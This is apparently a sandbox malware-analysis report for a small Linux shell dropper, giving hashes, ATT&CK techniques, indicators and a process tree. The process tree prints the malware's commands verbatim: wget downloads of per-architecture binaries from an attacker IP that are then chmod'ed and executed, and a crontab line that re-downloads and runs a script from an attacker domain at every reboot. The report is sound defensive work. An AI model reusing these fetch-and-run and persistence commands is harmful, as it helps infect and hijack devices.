8b41d5f588ba7f38a91c67da9a6fb04bcb51eb0788423e1e8a1c546dc8fc615a

Analysis

max time kernel
149s
max time network
150s
platform
debian-9_armhf
resource
debian9-armhf-20240611-en
resource tags

arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
submitted
30-12-2024 01:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
Size

610B
MD5

92d13edccd8d4b5832ee62c441c24785
SHA1

dbb27ddb5dca8aead2e72e887c24cfce68947a22
SHA256

8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f
SHA512

d3f9223e692eff6ec1e5067555f05bf676489959fddddf3f890afa8006ae0c27500d61fabfcff3d14d1f03acd0f573b1cd61a1ee78ce16e9da4b075a03cd606a

Score

7^/10

defense_evasion discovery execution persistence privilege_escalatio

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
688	sh
717	chmod
726	chmod
729	chmod
732	chmod
668	chmod
686	chmod
720	chmod
723	chmod
735	chmod

Executes dropped EXE 8 IoCs

ioc	pid	Process
/run/user/0/upnp	687	upnp
/run/user/0/upnp	718	upnp
/run/user/0/upnp	721	upnp
/run/user/0/upnp	724	upnp
/run/user/0/upnp	727	upnp
/run/user/0/upnp	730	upnp
/run/user/0/upnp	733	upnp
/run/user/0/upnp	736	upnp

Renames itself 1 IoCs

pid	Process
687	upnp

Unexpected DNS network traffic destination 4 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	5.161.109.23
Destination IP	81.169.136.222
Destination IP	65.21.1.106
Destination IP	152.53.15.127

Creates/modifies Cron job 1 TTPs 1 IoCs

Cron allows running tasks on a schedule, and is commonly used for malware persistence.

execution persistence privilege_escalatio

Cron

T1053.003

description	ioc	Process
File opened for modification	/var/spool/cron/crontabs/tmp.0fVPHU	crontab

Enumerates running processes
Discovers information about currently running processes on the system

Changes its process name 1 IoCs

description	ioc	pid	Process
Changes the process name, possibly in an attempt to hide itself	[kswapd0]	687	upnp

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/739/status	upnp
File opened for reading	/proc/754/status	upnp
File opened for reading	/proc/284/stat	killall
File opened for reading	/proc/725/status	upnp
File opened for reading	/proc/737/status	upnp
File opened for reading	/proc/735/status	upnp
File opened for reading	/proc/106/stat	killall
File opened for reading	/proc/147/stat	killall
File opened for reading	/proc/706/status	upnp
File opened for reading	/proc/29/stat	killall
File opened for reading	/proc/755/status	upnp
File opened for reading	/proc/761/status	upnp
File opened for reading	/proc/723/status	upnp
File opened for reading	/proc/746/status	upnp
File opened for reading	/proc/753/status	upnp
File opened for reading	/proc/22/stat	killall
File opened for reading	/proc/42/stat	killall
File opened for reading	/proc/299/stat	killall
File opened for reading	/proc/641/cmdline	upnp
File opened for reading	/proc/166/stat	killall
File opened for reading	/proc/713/cmdline	upnp
File opened for reading	/proc/717/status	upnp
File opened for reading	/proc/633/cmdline	killall
File opened for reading	/proc/641/stat	killall
File opened for reading	/proc/4/stat	killall
File opened for reading	/proc/26/stat	killall
File opened for reading	/proc/573/stat	killall
File opened for reading	/proc/765/status	upnp
File opened for reading	/proc/24/stat	killall
File opened for reading	/proc/712/status	upnp
File opened for reading	/proc/741/status	upnp
File opened for reading	/proc/734/status	upnp
File opened for reading	/proc/764/status	upnp
File opened for reading	/proc/640/stat	killall
File opened for reading	/proc/643/stat	killall
File opened for reading	/proc/704/status	upnp
File opened for reading	/proc/636/stat	killall
File opened for reading	/proc/mounts	upnp
File opened for reading	/proc/638/stat	killall
File opened for reading	/proc/649/cmdline	upnp
File opened for reading	/proc/700/status	upnp
File opened for reading	/proc/710/status	upnp
File opened for reading	/proc/filesystems	killall
File opened for reading	/proc/589/stat	killall
File opened for reading	/proc/591/stat	killall
File opened for reading	/proc/15/stat	killall
File opened for reading	/proc/16/stat	killall
File opened for reading	/proc/28/stat	killall
File opened for reading	/proc/109/cmdline	killall
File opened for reading	/proc/269/stat	killall
File opened for reading	/proc/5/stat	killall
File opened for reading	/proc/7/stat	killall
File opened for reading	/proc/10/stat	killall
File opened for reading	/proc/728/status	upnp
File opened for reading	/proc/729/status	upnp
File opened for reading	/proc/709/status	upnp
File opened for reading	/proc/714/status	upnp
File opened for reading	/proc/731/status	upnp
File opened for reading	/proc/740/status	upnp
File opened for reading	/proc/758/status	upnp
File opened for reading	/proc/23/stat	killall
File opened for reading	/proc/140/stat	killall
File opened for reading	/proc/634/cmdline	killall
File opened for reading	/proc/627/stat	killall

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
725	wget
727	upnp

Writes file to shm directory 1 IoCs

Malware can drop malicious files in the shm directory which will run directly from RAM.

description	ioc	Process
File opened for modification	/dev/shm/.a	8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/.a	8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown

/tmp/8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
/tmp/8de33221d6d2c4845384f131583dbae52cb5eb1571311e26ca03566fc6d0740f.unknown
1⤵
- Writes file to shm directory
- Writes file to tmp directory
PID:641
- /usr/bin/killall
  killall -9 dvrLocker
  2⤵
  - Reads runtime system information
  PID:642
- /bin/cat
  cat /proc/mounts
  2⤵
  PID:650
- /bin/grep
  grep tmpfs
  2⤵
  PID:651
- /bin/grep
  grep rw
  2⤵
  PID:652
- /bin/grep
  grep -v noexe
  2⤵
  PID:653
- /usr/bin/cut
  cut -d " " -f 2
  2⤵
  PID:654
- /bin/rm
  rm -rf .a .f
  2⤵
  PID:656
- /bin/rm
  rm -rf .a .f
  2⤵
  PID:658
- /bin/rm
  rm -rf .a .f
  2⤵
  PID:660
- /bin/cp
  cp /proc/self/exe .f
  2⤵
  PID:664
- /bin/chmod
  chmod 777 .f
  2⤵
  - File and Directory Permissions Modification
  PID:668
- /bin/rm
  rm -rf upnp
  2⤵
  PID:670
- /usr/bin/wget
  wget http://103.188.82.218/t/arm -O -
  2⤵
  PID:672
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:686
- /run/user/0/upnp
  ./upnp tplink.arm
  2⤵
  - Executes dropped EXE
  - Renames itself
  - Changes its process name
  - Reads runtime system information
  PID:687
- - /bin/sh
    sh -c "(crontab -l ; echo \"@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh\") | crontab -"
    3⤵
    - File and Directory Permissions Modification
    PID:688
  - - /usr/bin/crontab
      crontab -
      4⤵
      Creates/modifies Cron job
      PID:690
  - - /usr/bin/crontab
      crontab -l
      4⤵
      PID:691
- /usr/bin/wget
  wget http://103.188.82.218/t/arm5 -O -
  2⤵
  PID:697
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:717
- /run/user/0/upnp
  ./upnp tplink.arm5
  2⤵
  - Executes dropped EXE
  PID:718
- /usr/bin/wget
  wget http://103.188.82.218/t/arm6 -O -
  2⤵
  PID:719
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:720
- /run/user/0/upnp
  ./upnp tplink.arm6
  2⤵
  - Executes dropped EXE
  PID:721
- /usr/bin/wget
  wget http://103.188.82.218/t/arm6 -O -
  2⤵
  PID:722
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:723
- /run/user/0/upnp
  ./upnp tplink.arm6
  2⤵
  - Executes dropped EXE
  PID:724
- /usr/bin/wget
  wget http://103.188.82.218/t/mips -O -
  2⤵
  - System Network Configuration Discovery
  PID:725
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:726
- /run/user/0/upnp
  ./upnp tplink.mips
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:727
- /usr/bin/wget
  wget http://103.188.82.218/t/mpsl -O -
  2⤵
  PID:728
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:729
- /run/user/0/upnp
  ./upnp tplink.mpsl
  2⤵
  - Executes dropped EXE
  PID:730
- /usr/bin/wget
  wget http://103.188.82.218/t/ppc -O -
  2⤵
  PID:731
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:732
- /run/user/0/upnp
  ./upnp tplink.ppc
  2⤵
  - Executes dropped EXE
  PID:733
- /usr/bin/wget
  wget http://103.188.82.218/t/x86 -O -
  2⤵
  PID:734
- /bin/chmod
  chmod 777 upnp
  2⤵
  - File and Directory Permissions Modification
  PID:735
- /run/user/0/upnp
  ./upnp tplink.x86
  2⤵
  - Executes dropped EXE
  PID:736

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Cron

T1053.003

Persistence

Scheduled Task/Job

T1053

Cron

T1053.003

Privilege Escalation

Scheduled Task/Job

T1053

Cron

T1053.003

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/run/user/0/.f

Filesize
82KB

MD5
d89fb71971ef87948c4609f4176aa351

SHA1
c1b55e8f203e493b7f159a54fcd790f041950f19

SHA256
be74b028c309d3e0b4791727a3a0da8b3eb278c95860b55f9c42cc16dcb40fd4

SHA512
7248344009497a33f134707b3ef610b8bf1022656303d6cd9aa28b50ab903d82da498c5ac110da828e513dc1ff42942721ddbc0d2744fd0e0f4a26a24f60dc10

Download Submit
/run/user/0/upnp

Filesize
73KB

MD5
f812a7b3a877f717eb6e54b843b41848

SHA1
21ee67d9a9b638621646e1b57fdc0f1eb0bdfa25

SHA256
9a7e77eff17b6bab95e53989adca31512823cf0c92a342a1b7e2ca445d9bb560

SHA512
c236138e33d6d68c2bf4a6f5a4289070089b5bdb4ee153bc9f317e6ed5da00cb3b2117c68f427d0d58b072a7d453c728f5471c257e752b3514a1077b6978a732

Download Submit
/run/user/0/upnp

Filesize
77KB

MD5
d09db60a70d5b53b5b53ad39476fd7e8

SHA1
73a75e5e8200f77d857a7256cc0979077e29241d

SHA256
36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165

SHA512
ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04

Download Submit
/var/spool/cron/crontabs/tmp.0fVPHU

Filesize
306B

MD5
4c824988bdb8ef595336e437fa9cd222

SHA1
92601372c30b495ad2544f8fa2ae2b793fbbf7a2

SHA256
008e45804a9cd2dce79fca3912ad4b45f90a2a78239da83c04fd2d82ad3bd17a

SHA512
b363814a37c41efc03144c123fadc1348bf7673529b8cec87edd9536d4f912e6d553d799ea5c2ddc5300213a433ed69aa04e05d3d1d77bcec1a78b79834d87f3

Download Submit

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads